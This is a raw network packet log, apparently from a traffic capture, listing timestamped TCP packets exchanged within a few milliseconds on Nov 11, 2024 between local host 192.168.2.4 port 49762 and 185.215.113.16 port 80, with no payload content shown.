                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860184908 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860217094 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860393047 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860404968 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860416889 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860430002 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860440016 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860440969 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860450983 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860485077 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860532045 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860548973 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860558033 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860569000 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860569000 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860583067 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860594988 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860605955 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860615969 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860615969 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860626936 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860630035 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860651016 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860658884 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860671043 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860682011 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860682011 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860696077 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860711098 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860707045 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860724926 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860737085 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860739946 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860766888 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860773087 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860805035 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860817909 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860827923 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860840082 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860848904 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860852957 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860866070 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860877991 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860879898 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860893011 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860898018 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860904932 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860922098 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860953093 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860960960 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860972881 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860984087 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.860996962 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861007929 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861008883 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861021996 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861030102 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861042976 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861071110 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861263990 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861277103 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861285925 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861308098 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861335039 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861423969 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861438036 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861448050 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861459017 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861466885 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861471891 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861486912 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861496925 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861498117 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861510992 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861512899 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861524105 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861536026 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861546993 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861555099 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861558914 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861571074 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861578941 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861591101 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861596107 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861603022 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861614943 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861619949 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861627102 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861639977 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861650944 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861654997 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861663103 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861675024 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861677885 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861687899 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861695051 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861701012 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861717939 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861721992 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861732960 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861745119 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861745119 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861758947 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861771107 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861778975 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861782074 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861795902 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861803055 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861808062 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861815929 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861820936 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861834049 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861854076 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861857891 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861866951 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861867905 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861881018 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861893892 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861898899 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861908913 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861922979 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861931086 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861933947 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861947060 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861958027 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861958981 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861978054 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.861982107 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862004995 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862009048 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862021923 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862030983 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862034082 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862047911 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862066984 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862071991 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862081051 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862092018 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862092972 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862112045 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862123966 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862127066 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862137079 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862140894 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862154007 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862168074 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862176895 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862181902 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862194061 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862210989 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862215042 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862215996 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862229109 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862236023 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862241983 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862253904 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862263918 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862266064 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862277031 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862287998 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862299919 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862308979 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862310886 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862318039 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862323999 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862338066 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862344027 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862349987 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862368107 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862380028 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862380981 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862392902 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862402916 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862405062 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862417936 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862422943 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862430096 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862442017 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862446070 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862467051 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862481117 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862485886 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862498999 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862509012 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862513065 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862525940 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862536907 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862538099 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862549067 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862561941 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862570047 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862575054 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862586975 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862598896 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862597942 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862608910 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862620115 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862626076 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862638950 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862652063 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862663984 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862667084 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862677097 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862682104 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862689018 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862700939 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862711906 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862716913 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862724066 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862736940 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862747908 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862751961 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862760067 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862760067 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862772942 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862786055 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862788916 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862804890 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862813950 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862818003 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862826109 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862832069 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862844944 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862854958 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862854958 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862869024 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862883091 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862895966 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862896919 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862907887 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862915039 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862922907 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862934113 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862942934 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862946987 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862960100 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862972021 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862977028 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862986088 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862994909 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.862998962 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863010883 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863023996 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863025904 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863035917 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863046885 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863054037 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863055944 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863075972 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863080025 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863096952 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863109112 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863118887 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863122940 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863132000 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863145113 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863146067 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.863157988 CET8049762185.215.113.16192.168.2.4
